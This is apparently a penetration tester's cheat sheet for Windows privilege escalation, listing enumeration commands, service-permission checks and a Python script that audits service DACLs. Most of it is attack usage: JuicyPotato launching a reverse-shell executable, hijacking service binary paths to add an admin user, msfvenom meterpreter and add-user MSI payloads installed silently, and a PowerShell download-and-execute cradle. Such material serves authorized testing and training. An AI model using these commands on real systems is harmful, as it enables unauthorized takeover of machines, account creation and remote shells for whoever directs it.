Windows Privilege Escalation
A collection of goodies, one-liners, and to-dos to keep in your back pocket!
System
Check for goodies in environment variables
set
Get OS and architecture
systeminfo
systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type"
View recent KBs installed
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe list full
Local storage
wmic logicaldisk get caption,description,providername
Get .NET Framework versions (winPEAS binary pre-req)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version
dir /b /ad /o-n %systemroot%\Microsoft.NET\Framework\v?.*
- Enable RDP Access
Users
Get your user
whoami
Get your privileges
whoami /priv
Get your groups
whoami /groups
View other users
net user
net user <username>
View local groups
net localgroup
(may not work without a logon session; specify the group instead)
net localgroup administrators
List scheduled tasks
schtasks /query /fo LIST /v
Network
Get IP addresses
ipconfig /all
Get ARP table
arp -a
Get route table
route print
See what ports are listening and who we are communicating with
netstat -ano
Passwords
Search current directory for certain files containing "password"
findstr /si password *.txt *.ini *.config
Search for files that contain password in filename
dir /s *password*
Firewall / AntiVirus
Check for firewall settings
netsh firewall show state
netsh firewall show config
Get antivirus
wmic /node:localhost /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
- Bypass Anti-Virus with Hyperion
Services
Check for running services
net start
wmic service list brief
Check for installed drivers
DRIVERQUERY
Link running processes to services
tasklist /SVC
Get permission string for all services
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
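The one-liner above dumps one raw SDDL string per service, which is hard to read by eye. As an added example (not part of the original notes), this Python script parses that dump offline and flags services whose DACL grants low-privileged principals rights such as CHANGE_CONFIG or WRITE_DAC, which is exactly what an audit of service permissions looks for. The service names and descriptors in SAMPLE are constructed to match the dump's shape.

```python
import re

# Service access-right abbreviations used in SDDL (subset relevant to services).
RIGHTS = {
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
    "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
    "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE",
}
# Well-known SID abbreviations for low-privileged principals.
LOW_PRIV = {"AU": "Authenticated Users", "BU": "Users", "WD": "Everyone", "IU": "Interactive"}
# Rights that let the holder change the service binary path or rewrite the DACL.
DANGEROUS = {"DC", "WD", "WO", "GA", "GW"}
# ACE fields: (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\((A|D);[^;]*;([A-Z]*);[^;]*;[^;]*;([^)]+)\)")

# Constructed sample in the shape the one-liner produces: name, sdshow output, separator.
SAMPLE = """Spooler

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
---------
VulnSvc

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)
---------
"""

def parse_dacl(sddl):
    """Return (ace_type, [two-letter rights], sid) per ACE in the DACL; the SACL (S:) is ignored."""
    dacl = sddl.split("S:")[0]
    return [(t, [r[i:i + 2] for i in range(0, len(r), 2)], sid)
            for t, r, sid in ACE_RE.findall(dacl)]

def audit(dump):
    """Map service -> [(principal, [dangerous rights])] for allow-ACEs granted to low-priv SIDs."""
    findings = {}
    for block in dump.split("---------"):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if len(lines) < 2:
            continue
        name, sddl = lines[0], lines[1]
        for ace_type, rights, sid in parse_dacl(sddl):
            if ace_type != "A" or sid not in LOW_PRIV:
                continue
            bad = sorted(set(rights) & DANGEROUS)
            if bad:
                findings.setdefault(name, []).append((LOW_PRIV[sid], [RIGHTS[r] for r in bad]))
    return findings
```

Feed the contents of file b (or a saved copy of the one-liner's console output) to audit(); an empty result means no low-privileged principal can reconfigure any service.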
- Windows XP? You can probably exploit upnphost
Impersonation
whoami /priv
Have SeImpersonate or SeAssignPrimaryToken?
You must find a CLSID here: http://ohpe.it/juicy-potato/CLSID/
JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Unquoted Service Paths
Find unquoted binary paths in services
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Check permissions, can we write to the directory we want and start/stop service?
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
icacls [Directory]
sc stop [service] && sc start [service]
Edit binary path
sc config [service] binpath= "[malicious exe path]"
sc stop [service]
sc start [service]
If we don't want to redirect to a reverse shell exe we can make a new user instead
sc config [service] binpath= "net user admin password /add"
AlwaysInstallElevated
Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Create msi payload
msfvenom -p windows/adduser USER=admin PASS=password -f msi -o filename.msi
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi
Install elevated payload
msiexec /quiet /qn /i C:\Users\filename.msi
Unattended Installs
Check for unattended install files. May contain base64 encoded passwords for local admin accounts.
C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\
Unattend.xml
unattended.xml
unattend.txt
sysprep.xml
sysprep.inf
PowerShell
Run something without ever touching the disk
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://blah/blah.exe'); Invoke-AllChecks"
Common Exploits
Here's a list of some common exploits worth investigating when looking at privilege escalation.
Windows Vista/7 – Elevation of Privileges (UAC Bypass)
Microsoft Windows 7 SP1 (x86) – ‘WebDAV’ Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 (x86) – Privilege Escalation (MS16-014)
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Privilege Escalation (MS16-032)
CVE-2017-0213: Windows COM Elevation of Privilege Vulnerability
- https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213